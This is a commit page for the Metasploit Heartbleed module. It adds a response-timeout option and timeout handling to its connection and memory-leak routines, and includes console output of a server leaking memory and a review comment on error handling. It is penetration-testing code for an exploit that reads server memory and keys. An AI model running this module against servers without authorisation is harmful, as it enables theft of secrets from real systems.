
Commit 1cf1616

committed
Rebase. Add timeout option support
Rebase to account for the KEYS merge. Modify bleed() to work with timeout option. Modify establish_connect() to work with timeout option. Modify loot_and_report() to work with timeout option. ---Test Console Output--- Client Hello Timeout: msf auxiliary(openssl_heartbleed) > run [*] 127.0.0.1:443 - Sending Client Hello... [-] 127.0.0.1:443 - No Client Hello response after 10 seconds... [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Patched Apache: msf auxiliary(openssl_heartbleed) > run [*] 127.0.0.1:443 - Sending Client Hello... [*] 127.0.0.1:443 - Sending Heartbeat... [-] 127.0.0.1:443 - No Heartbeat response... [-] 127.0.0.1:443 - Looks like there isn't leaked information... [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Vulnerable Server: msf auxiliary(openssl_heartbleed) > run [*] 192.168.1.3:443 - Sending Client Hello... [*] 192.168.1.3:443 - Sending Heartbeat... [*] 192.168.1.3:443 - Heartbeat response, 17403 bytes [+] 192.168.1.3:443 - Heartbeat response with leak [*] 192.168.1.3:443 - Printable info leaked: STUFF STUFF STUFF [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
1 parent 021ac53 commit 1cf1616


1 file changed

+22
-9
lines changed

1 file changed

+22
-9
lines changed

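--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -110,7 +110,8 @@ def initialize
 'juan vazquez', # Msf module
 'Sebastiano Di Paola', # Msf module
 'Tom Sellers', # Msf module
-'jjarmoc' #Msf module; keydump, refactoring..
+'jjarmoc', #Msf module; keydump, refactoring..
+'Ben Buchanan' #Msf module
 ],
 'References' =>
 [
@@ -140,7 +141,8 @@ def initialize
 OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]),
 OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 10]),
 OptInt.new('STATUS_EVERY', [true, 'How many retries until status', 5]),
-OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil])
+OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]),
+OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10])
 ], self.class)
 
 register_advanced_options(
@@ -186,6 +188,10 @@ def peer
 "#{rhost}:#{rport}"
 end
 
+def response_timeout
+datastore['RESPONSE_TIMEOUT']
+end
+
 def tls_smtp
 # https://tools.ietf.org/html/rfc3207
 sock.get_once
@@ -237,15 +243,15 @@ def jabber_connect_msg(hostname)
 
 def tls_jabber
 sock.put(jabber_connect_msg(datastore['XMPPDOMAIN']))
-res = sock.get
+res = sock.get(response_timeout)
 if res && res.include?('host-unknown')
 jabber_host = res.match(/ from='([\w.]*)' /)
 if jabber_host && jabber_host[1]
 disconnect
 connect
 vprint_status("#{peer} - Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...")
 sock.put(jabber_connect_msg(jabber_host[1]))
-res = sock.get
+res = sock.get(response_timeout)
 end
 end
 if res.nil? || res.include?('stream:error') || res !~ /<starttls xmlns=['"]urn:ietf:params:xml:ns:xmpp-tls['"]/
@@ -254,14 +260,14 @@ def tls_jabber
 end
 msg = "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
 sock.put(msg)
-res = sock.get
+res = sock.get(response_timeout)
 return nil if res.nil? || !res.include?('<proceed')
 res
 end
 
 def tls_ftp
 # http://tools.ietf.org/html/rfc4217
-res = sock.get
+res = sock.get(response_timeout)
 return nil if res.nil?
 sock.put("AUTH TLS\r\n")
 res = sock.get_once
@@ -291,7 +297,7 @@ def run_host(ip)
 
 def bleed()
 # This actually performs the heartbleed portion
-establish_connect
+return :timeout if (establish_connect) == :timeout
 vprint_status("#{peer} - Sending Heartbeat...")
 sock.put(heartbeat(heartbeat_length))
 hdr = sock.get_once(5)
@@ -335,6 +341,7 @@ def bleed()
 end
 
 def loot_and_report(heartbeat_data)
+return if heartbeat_data == :timeout
 if heartbeat_data
 print_good("#{peer} - Heartbeat response with leak")
 report_vuln({
@@ -344,7 +351,7 @@ def loot_and_report(heartbeat_data)
 :refs => self.references,
 :info => "Module #{self.fullname} successfully leaked info"
 })
-if action.name == 'DUMP' # Check mode, dump if requested.
+if datastore['MODE'] == 'DUMP' # Check mode, dump if requested.
 pattern = datastore['DUMPFILTER']
 if pattern
 match_data = heartbeat_data.scan(pattern).join
@@ -506,7 +513,12 @@ def establish_connect
 vprint_status("#{peer} - Sending Client Hello...")
 sock.put(client_hello)
 
-server_hello = sock.get
+server_hello = sock.get(response_timeout)
+unless server_hello
+vprint_error("#{peer} - No Client Hello response after #{response_timeout} seconds...")
+return :timeout
+end
+
 unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE
 vprint_error("#{peer} - Server Hello Not Found")
 return
@@ -534,3 +546,4 @@ def key_from_pqe(p, q, e)
 end
 
 end
+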
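Review bot: The guard `return :timeout if (establish_connect) == :timeout` in bleed() covers only the new timeout path; the pre-existing bare `return` (nil) after "Server Hello Not Found" in the establish_connect hunk is still ignored, so bleed() goes on to send a heartbeat and read a response on a connection whose handshake was never confirmed. Since establish_connect now signals failure with a sentinel, the handshake-failure branch could do the same (e.g. `return :no_server_hello` in place of the bare `return`), with bleed() propagating any sentinel via `result = establish_connect` / `return result if result.is_a?(Symbol)` and loot_and_report() checking `return if heartbeat_data.is_a?(Symbol)`; the parentheses around `(establish_connect)` are superfluous either way. The bodies of bleed(), loot_and_report() and establish_connect continue outside their hunks, so whether establish_connect's success path returns a value that would collide with such a check should be confirmed there. Separately, the switch from `action.name == 'DUMP'` to `datastore['MODE'] == 'DUMP'` in loot_and_report is not explained by the description and no MODE option appears in the register_options hunk, so it is worth confirming it is intended rather than a rebase artifact.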